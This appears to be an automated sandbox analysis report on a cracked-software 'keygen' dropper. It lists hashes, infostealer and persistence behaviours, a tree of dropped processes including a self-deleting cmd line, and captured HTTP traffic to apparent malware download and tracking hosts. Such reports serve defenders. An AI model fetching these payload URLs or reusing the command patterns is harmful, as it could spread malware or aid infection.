Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

12/11/2024, 01:29 UTC

241112-bwgrxs1gnf 10

08/07/2021, 12:18 UTC

210708-8z6d5h8z2n 10

06/07/2021, 17:53 UTC

210706-g6we6sa7sa 10

19/06/2021, 18:17 UTC

210619-vr8bj2dzfn 10

17/06/2021, 21:39 UTC

210617-a9cvlnmrbx 10

11/06/2021, 17:26 UTC

210611-wvab1yw2tj 10

08/06/2021, 06:47 UTC

210608-qrbpch3y46 10

08/06/2021, 06:47 UTC

210608-64tndgm1ln 10

05/06/2021, 18:40 UTC

210605-cd6qpr55sx 10

04/06/2021, 11:56 UTC

210604-5c416rs3ns 10

Analysis

  • max time kernel
    1782s
  • max time network
    1488s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    11/06/2021, 17:26 UTC

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Executes dropped EXE 11 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 40 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Modifies data under HKEY_USERS 29 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:848
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1180
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:792
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:1708
      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
        1⤵
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
          2⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1280
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
            3⤵
            • Loads dropped DLL
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1952
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1720
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:912
          • C:\Users\Admin\AppData\Local\Temp\is-726TB.tmp\Install.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-726TB.tmp\Install.tmp" /SL5="$30182,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:892
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
          2⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1628
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              4⤵
              • Runs ping.exe
              PID:1732
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
          2⤵
          • Executes dropped EXE
          PID:1544
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Modifies system certificate store
          PID:2024
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            PID:1500
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:1680
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:1324
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:1464
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1536
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1536 CREDAT:275457 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • NTFS ADS
          • Suspicious use of SetWindowsHookEx
          PID:952

      Network

      • flag-unknown
        DNS
        facebook.websmails.com
        SystemNetworkService
        Remote address:
        8.8.8.8:53
        Request
        facebook.websmails.com
        IN A
        Response
        facebook.websmails.com
        IN A
        167.179.89.78
      • flag-unknown
        DNS
        facebook.websmails.com
        SystemNetworkService
        Remote address:
        8.8.8.8:53
        Request
        facebook.websmails.com
        IN AAAA
        Response
      • flag-unknown
        DNS
        pirod-dcn.xyz
        JoSetp.exe
        Remote address:
        8.8.8.8:53
        Request
        pirod-dcn.xyz
        IN A
        Response
        pirod-dcn.xyz
        IN A
        104.21.9.70
        pirod-dcn.xyz
        IN A
        172.67.189.44
      • flag-unknown
        GET
        https://pirod-dcn.xyz/?id=bj1
        JoSetp.exe
        Remote address:
        104.21.9.70:443
        Request
        GET /?id=bj1 HTTP/1.1
        Host: pirod-dcn.xyz
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db6837e000000cda0162000000001
        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=FEjXbSPDYCvhOocT7OBnUFwaej8mWlZcj6nnc9w7jNEyONw2K5M1qJZirJrSwSNLvgq4mDGuVCUH2Ek2Nd%2BjDRHd7%2BtHV2aIIuuQyhc92A%2FrKEjelVXPdeMR%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 65dc8d18ce9f00cd-AMS
        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
      • flag-unknown
        GET
        https://pirod-dcn.xyz/?id=bj2
        JoSetp.exe
        Remote address:
        104.21.9.70:443
        Request
        GET /?id=bj2 HTTP/1.1
        Host: pirod-dcn.xyz
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db6843d000000cd48a4f000000001
        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=hBUfjRbB2%2FSIM92E%2BLsYmSnk0NOVt4UVgoUJdmUlk6TD1yKooNBrv%2FUXDjouMngUH4Zk8xgo4uPTmvzsCdde%2Btn7We7so8QH5NjVrw%2B4jjnaUgc4CtTCvNn5lw%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 65dc8d19f80800cd-AMS
        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
      • flag-unknown
        GET
        https://pirod-dcn.xyz/?id=bj3
        JoSetp.exe
        Remote address:
        104.21.9.70:443
        Request
        GET /?id=bj3 HTTP/1.1
        Host: pirod-dcn.xyz
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db684ea000000cd69264000000001
        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=QJIAySq8bZF2URHye4fQBn1T64CmGdzOl3hJO3Z2gT2t3Syku10hrWe9ptPQlVvkla7sN%2B6Y1DynGPEIbqPFKc5NS9XRkSOnWBB9i%2FvX%2FB3gd4OFL42lRRs0Xg%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 65dc8d1b197600cd-AMS
        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
      • flag-unknown
        GET
        https://pirod-dcn.xyz/?id=bj4
        JoSetp.exe
        Remote address:
        104.21.9.70:443
        Request
        GET /?id=bj4 HTTP/1.1
        Host: pirod-dcn.xyz
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db68590000000cda62f1000000001
        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=JERx0edtBjHL8SrKbtMA7sBPTXKO9sL8kcK5L8DMTf0ZrQKeoVeatNg6QLHIJMRUdsVfCDOXW7CGxfScNeh%2FGvYj%2Bpb1ZwZnr6dECGKE7NAbAyiNHJMoyRHECQ%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 65dc8d1c1ae000cd-AMS
        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
      • flag-unknown
        GET
        https://pirod-dcn.xyz/?id=bj5
        JoSetp.exe
        Remote address:
        104.21.9.70:443
        Request
        GET /?id=bj5 HTTP/1.1
        Host: pirod-dcn.xyz
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db685ed000000cd74835000000001
        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2QWLPATd0RpuilGrNTNPPGEXEPjjEPtP2aZHYbhrcj3WcjmdgmJps2ZBeQrDtETZ7NirnQQrBRBRsalKcXIzaHQo9zV%2BIWmSTjNuw9Edm4B9SLPX%2BjDXZ7SbrA%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 65dc8d1cab8900cd-AMS
        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
      • flag-unknown
        GET
        https://pirod-dcn.xyz/?id=bj6
        JoSetp.exe
        Remote address:
        104.21.9.70:443
        Request
        GET /?id=bj6 HTTP/1.1
        Host: pirod-dcn.xyz
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db686a7000000cd8e952000000001
        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VvYOJUB%2F9xXxP3gKNdRRBa3Z5ltAlldPzwb6HaWr0%2FJT9lCewOsZaQ2n64ZdSx80iRP7AqZYTUEgzFtgUAClu4cquBkC4Mox5vV7sDD%2BlbhdaHv0kpVALAhlzw%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 65dc8d1ddcec00cd-AMS
        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
      • flag-unknown
        DNS
        iplogger.org
        gaoou.exe
        Remote address:
        8.8.8.8:53
        Request
        iplogger.org
        IN A
        Response
        iplogger.org
        IN A
        88.99.66.31
      • flag-unknown
        GET
        https://iplogger.org/1p6br7
        JoSetp.exe
        Remote address:
        88.99.66.31:443
        Request
        GET /1p6br7 HTTP/1.1
        Host: iplogger.org
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:27:38 GMT
        Content-Type: image/png
        Transfer-Encoding: chunked
        Connection: keep-alive
        Set-Cookie: PHPSESSID=jo77isi5a9u8coeqk2jkt9jmv5; path=/; HttpOnly
        Pragma: no-cache
        Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=255615733; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Cache-Control: no-cache
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Answers:
        whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
        Strict-Transport-Security: max-age=31536000; preload
        X-Frame-Options: DENY
      • flag-unknown
        DNS
        global-sc-ltd.com
        Install.tmp
        Remote address:
        8.8.8.8:53
        Request
        global-sc-ltd.com
        IN A
        Response
        global-sc-ltd.com
        IN A
        99.83.154.118
      • flag-unknown
        HEAD
        http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe
        Install.tmp
        Remote address:
        99.83.154.118:80
        Request
        HEAD /EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe HTTP/1.1
        Accept: */*
        User-Agent: InnoDownloadPlugin/1.5
        Host: global-sc-ltd.com
        Content-Length: 0
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:42 GMT
        Content-Type: text/html; charset=UTF-8
        Connection: keep-alive
        Server: nginx
        Vary: Accept-Encoding
        Vary: Accept-Encoding
        X-Language: english
        X-Template: tpl_CleanPeppermintBlackBlank_twoclick
        X-Buckets: bucket052
        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_WTJkXfqRiTI5FbebkwjmtoRuSUIip4ljADLbHm1B94oze1DVcNb73yylU6ZBUXysesPpkJhTZke8ML9B2I6U3A==
      • flag-unknown
        GET
        http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe
        Install.tmp
        Remote address:
        99.83.154.118:80
        Request
        GET /EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe HTTP/1.1
        Accept: */*
        User-Agent: InnoDownloadPlugin/1.5
        Host: global-sc-ltd.com
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:42 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Server: nginx
        Vary: Accept-Encoding
        Vary: Accept-Encoding
        X-Language: english
        X-Template: tpl_CleanPeppermintBlackBlank_twoclick
        X-Buckets: bucket052
        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_WTJkXfqRiTI5FbebkwjmtoRuSUIip4ljADLbHm1B94oze1DVcNb73yylU6ZBUXysesPpkJhTZke8ML9B2I6U3A==
      • flag-unknown
        GET
        https://iplogger.org/1in2a7
        filee.exe
        Remote address:
        88.99.66.31:443
        Request
        GET /1in2a7 HTTP/1.1
        Host: iplogger.org
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:27:43 GMT
        Content-Type: image/png
        Transfer-Encoding: chunked
        Connection: keep-alive
        Set-Cookie: PHPSESSID=use342p54olk20it4s2284k7i1; path=/; HttpOnly
        Pragma: no-cache
        Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=255615728; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Cache-Control: no-cache
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Answers: 2
        whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
        Strict-Transport-Security: max-age=31536000; preload
        X-Frame-Options: DENY
      • flag-unknown
        DNS
        hirezz.com
        filee.exe
        Remote address:
        8.8.8.8:53
        Request
        hirezz.com
        IN A
        Response
        hirezz.com
        IN A
        162.144.12.143
      • flag-unknown
        GET
        http://hirezz.com/test/includes/fw1.php
        filee.exe
        Remote address:
        162.144.12.143:80
        Request
        GET /test/includes/fw1.php HTTP/1.1
        Host: hirezz.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 302 Found
        Date: Fri, 11 Jun 2021 17:27:43 GMT
        Server: nginx/1.19.10
        Content-Type: text/html; charset=iso-8859-1
        Content-Length: 227
        Location: http://hirezz.com/cgi-sys/suspendedpage.cgi
        X-Server-Cache: true
        X-Proxy-Cache: HIT
      • flag-unknown
        GET
        http://hirezz.com/cgi-sys/suspendedpage.cgi
        filee.exe
        Remote address:
        162.144.12.143:80
        Request
        GET /cgi-sys/suspendedpage.cgi HTTP/1.1
        Host: hirezz.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:44 GMT
        Server: nginx/1.19.10
        Content-Type: text/html
        Vary: Accept-Encoding
        X-Server-Cache: false
        Transfer-Encoding: chunked
      • flag-unknown
        GET
        http://hirezz.com/test/includes/fw2.php
        filee.exe
        Remote address:
        162.144.12.143:80
        Request
        GET /test/includes/fw2.php HTTP/1.1
        Host: hirezz.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 302 Found
        Date: Fri, 11 Jun 2021 17:27:44 GMT
        Server: nginx/1.19.10
        Content-Type: text/html; charset=iso-8859-1
        Content-Length: 227
        Location: http://hirezz.com/cgi-sys/suspendedpage.cgi
        X-Server-Cache: true
        X-Proxy-Cache: HIT
      • flag-unknown
        GET
        http://hirezz.com/test/includes/fw3.exe
        filee.exe
        Remote address:
        162.144.12.143:80
        Request
        GET /test/includes/fw3.exe HTTP/1.1
        Host: hirezz.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 302 Found
        Date: Fri, 11 Jun 2021 17:27:44 GMT
        Server: Apache
        Location: http://hirezz.com/cgi-sys/suspendedpage.cgi
        Content-Length: 227
        Keep-Alive: timeout=5, max=72
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
      • flag-unknown
        GET
        http://hirezz.com/test/includes/fw4.exe
        filee.exe
        Remote address:
        162.144.12.143:80
        Request
        GET /test/includes/fw4.exe HTTP/1.1
        Host: hirezz.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 302 Found
        Date: Fri, 11 Jun 2021 17:27:44 GMT
        Server: Apache
        Location: http://hirezz.com/cgi-sys/suspendedpage.cgi
        Content-Length: 227
        Keep-Alive: timeout=5, max=71
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
      • flag-unknown
        GET
        http://hirezz.com/test/includes/fw5.exe
        filee.exe
        Remote address:
        162.144.12.143:80
        Request
        GET /test/includes/fw5.exe HTTP/1.1
        Host: hirezz.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 302 Found
        Date: Fri, 11 Jun 2021 17:27:44 GMT
        Server: Apache
        Location: http://hirezz.com/cgi-sys/suspendedpage.cgi
        Content-Length: 227
        Keep-Alive: timeout=5, max=70
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
      • flag-unknown
        GET
        http://hirezz.com/test/includes/soft.exe
        filee.exe
        Remote address:
        162.144.12.143:80
        Request
        GET /test/includes/soft.exe HTTP/1.1
        Host: hirezz.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 302 Found
        Date: Fri, 11 Jun 2021 17:27:44 GMT
        Server: Apache
        Location: http://hirezz.com/cgi-sys/suspendedpage.cgi
        Content-Length: 227
        Keep-Alive: timeout=5, max=69
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
      • flag-unknown
        GET
        https://iplogger.org/1rFsB6
        IEXPLORE.EXE
        Remote address:
        88.99.66.31:443
        Request
        GET /1rFsB6 HTTP/1.1
        Accept: text/html, application/xhtml+xml, */*
        Accept-Language: en-US
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Accept-Encoding: gzip, deflate
        Host: iplogger.org
        Connection: Keep-Alive
        Cookie: clhf03028ja=154.61.71.51
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:27:46 GMT
        Content-Type: image/png
        Transfer-Encoding: chunked
        Connection: keep-alive
        Set-Cookie: PHPSESSID=liui0f129us5vklmuj3cuslio3; path=/; HttpOnly
        Pragma: no-cache
        Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=255615725; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Cache-Control: no-cache
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Answers:
        whoami: b67ec23f4466f7452c81aed606c852615f0ddbae2755f3228dc6f5a050c1e8fd
        Strict-Transport-Security: max-age=31536000; preload
        X-Frame-Options: DENY
      • flag-unknown
        GET
        https://iplogger.org/favicon.ico
        IEXPLORE.EXE
        Remote address:
        88.99.66.31:443
        Request
        GET /favicon.ico HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: iplogger.org
        Connection: Keep-Alive
        Cookie: clhf03028ja=154.61.71.51; PHPSESSID=liui0f129us5vklmuj3cuslio3
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:27:47 GMT
        Content-Type: image/x-icon
        Content-Length: 16446
        Last-Modified: Wed, 17 Mar 2021 07:14:34 GMT
        Connection: keep-alive
        ETag: "6051ac5a-403e"
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Cache-Control: no-cache
        Strict-Transport-Security: max-age=31536000; preload
        X-Frame-Options: DENY
        Accept-Ranges: bytes
      • flag-unknown
        GET
        http://101.36.107.74/seemorebty/il.php?e=jg6_6asg
        jg6_6asg.exe
        Remote address:
        101.36.107.74:80
        Request
        GET /seemorebty/il.php?e=jg6_6asg HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
        Accept-Language: en-US,en;q=0.9
        Referer: https://www.facebook.com
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
        Host: 101.36.107.74
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:46 GMT
        Server: Apache/2.4.37 (centos)
        X-Powered-By: PHP/7.2.24
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        GET
        https://iplogger.org/ZhvS4
        jg6_6asg.exe
        Remote address:
        88.99.66.31:443
        Request
        GET /ZhvS4 HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
        Accept-Language: en-US,en;q=0.9
        Referer: https://www.facebook.com
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
        Host: iplogger.org
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:27:47 GMT
        Content-Type: image/png
        Transfer-Encoding: chunked
        Connection: keep-alive
